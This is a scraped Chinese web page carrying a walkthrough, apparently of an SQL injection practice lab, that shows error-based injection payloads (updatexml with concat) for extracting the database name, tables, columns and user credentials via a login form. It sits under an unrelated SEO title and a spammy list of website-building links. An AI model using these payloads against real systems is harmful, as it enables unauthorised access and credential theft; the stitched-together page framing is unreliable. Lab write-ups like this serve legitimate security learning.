当前位置: 首页 > news >正文

深圳电商网站设计wordpress divi教程

news 2025/9/17 23:20:40
深圳电商网站设计,wordpress divi教程,做网站的去哪找客户,aso安卓优化公司目录 1:分析 找闭合符: 2:开始注入 报错注入: 注入数据库名: 注入表名: 注入列名: 注入具体值: 1:分析 经过我们的实验发现当我们输入的密码后面存在双引号时会报…

目录

1:分析

找闭合符:

2:开始注入

报错注入:

注入数据库名:

注入表名:

注入列名:

注入具体值:

1:分析

        经过我们的实验发现当我们输入的密码后面存在双引号时会报错,由此可以发现注入点在此处。

找闭合符:

当我们输入正确的账号并在后面加上#后,可以成功登录,由此我们可以使用#进行闭合。

2:开始注入

        因为当我们输入的sql语句出错时web界面会将错误爆出来,所以我们可以使用报错注入的方式进行注入。

        在账号输入栏进行注入。

           

报错注入:

注入数据库名:

admin" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

注入表名:

admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

注入列名:

通过观察可以知道最有可能存放敏感信息的表为users表,所以我们将users表的信息注入出来。

admin " and  updatexml(1,concat(0x7e,(select  group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),0x7e),1) #

注入具体值:

        我们已经注入出来了列名,现在我们将username和password注入出来。

admin" and updatexml(1,substr(concat(0x7e,(select group_concat(username) from users),0x7e),1,32),1)#

到此我们就成功的注入了,想要注入其他的值只需要重复上面的操作即可。

             

http://www.yayakq.cn/news/758075/

相关文章:

  • 微信营销网络营销方式seo实战技术培训
  • 上海推广网站视觉设计图
  • 上海营销型网站标准专业做网站公司排名
  • 微网站和手机网站的区别搜索框html代码
  • 商业网站建立重庆高端网站制作
  • 怎么制作网站导航页wordpress导入数据库结构
  • 顺昌网站建设centos wordpress 权限
  • 上海建设银行青浦分行网站h5跳转小程序
  • 网页网站怎么做厦门建设网站公司
  • 网站建设的公司前景基于jsp网站开发开题报告
  • 鹤岗商城网站建设网络建站的费用
  • 电商网站开发ppt连云港企业网站建设公司
  • 制作网站怎么做的做二手货的网站有哪些
  • 网站推广优化排名公司百度微建站
  • 都有哪些网站我国网站建设的不足
  • 中山市做网站如何做好品牌网站建设策划
  • 长春火车站到长春机场大巴时刻表福田蒙派克10座商务车
  • 青海做网站找谁dede分类信息网站
  • 有全部公司的网站上海大型网站制作
  • 佛山微网站郑州本地网站
  • 图标设计网站郑州网站建设公司前景
  • 全网营销网站建设特点东莞网站建设公司电话
  • 网站建设新闻 常识室内设计公司 网站建设
  • php网站开发实验报告株洲网站排名优化价格
  • 重庆网站建设 公司一个好的网站有什么标准
  • 一个网站价格wordpress连接微博 破解
  • 达州市住房和建设厅网站wordpress 媒体库 显示
  • 响应式网站下载农村建设集团有限公司网站首页
  • 网站字体大小合适支付网站建设费会计分录
  • 网站备案 新增吉林智能建站系统价格